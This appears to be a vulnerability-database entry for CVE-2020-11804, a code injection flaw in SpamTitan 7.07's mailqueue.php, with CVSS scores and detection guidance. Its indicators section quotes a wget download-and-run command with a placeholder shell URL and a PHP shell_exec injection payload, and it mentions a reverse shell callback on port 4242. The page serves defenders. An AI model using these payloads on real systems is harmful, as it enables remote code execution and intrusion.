cbcvebase.
CVE-2020-11804
published 2020-09-17

CVE-2020-11804: An issue was discovered in Titan SpamTitan 7.07. Due to improper sanitization of the parameter quid, used in the page mailqueue.php, code injection can occur…

PriorityP261high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
7.11%
93.4th percentile
An issue was discovered in Titan SpamTitan 7.07. Due to improper sanitization of the parameter quid, used in the page mailqueue.php, code injection can occur. The input for this parameter is provided directly by an authenticated user via an HTTP GET request.

Affected

1 ranges
VendorProductVersion rangeFixed in
titanhqspamtitan

Detection & IOCsextracted from sources · hover to see the quote

path/mailqueue.php
path/tmp/r.py
command/usr/local/bin/wget <shellurl> -O /tmp/r.py;/usr/local/bin/python /tmp/r.py
path/certs-x.php
commandgotopage+a+";$b="<b64>";shell_exec(base64_decode(urldecode($b)));die();$b="
  • Monitor HTTP GET requests to mailqueue.php containing the 'qid' parameter with shell metacharacters or command injection sequences (e.g., semicolons, pipes, backticks, dollar-sign subshells).
  • Monitor POST requests to mailqueue.php where the 'jaction' parameter contains PHP eval-injectable payloads such as shell_exec, base64_decode, or urldecode function calls.
  • Alert on POST requests to certs-x.php where the 'fname' parameter contains shell command injection patterns such as '||', '$(...)', or path traversal sequences ('../../../../').
  • Detect outbound wget or python process spawns from the SpamTitan web process (e.g., /usr/local/bin/wget writing to /tmp/) as indicators of successful RCE exploitation.
  • Monitor for reverse shell listener connections on port 4242 originating from the SpamTitan host, as the PoC defaults to this port for the reverse shell callback.
  • Inspect POST bodies to mailqueue.php for base64-encoded payloads passed to the 'jaction' field, particularly those matching the pattern 'gotopage+a+' followed by PHP injection syntax.
  • ·Exploitation requires prior authentication to the SpamTitan web interface; unauthenticated attackers cannot directly trigger this vulnerability.
  • ·The PoC exploit targets SpamTitan Gateway 7.07 running on FreeBSD; exploitation paths (e.g., /usr/local/bin/wget, /usr/local/bin/python) are FreeBSD-specific and may differ on other platforms.
  • ·Earlier versions of SpamTitan Gateway prior to 7.07 may also be affected, broadening the scope of detection beyond just version 7.07.

CVSS provenance

nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.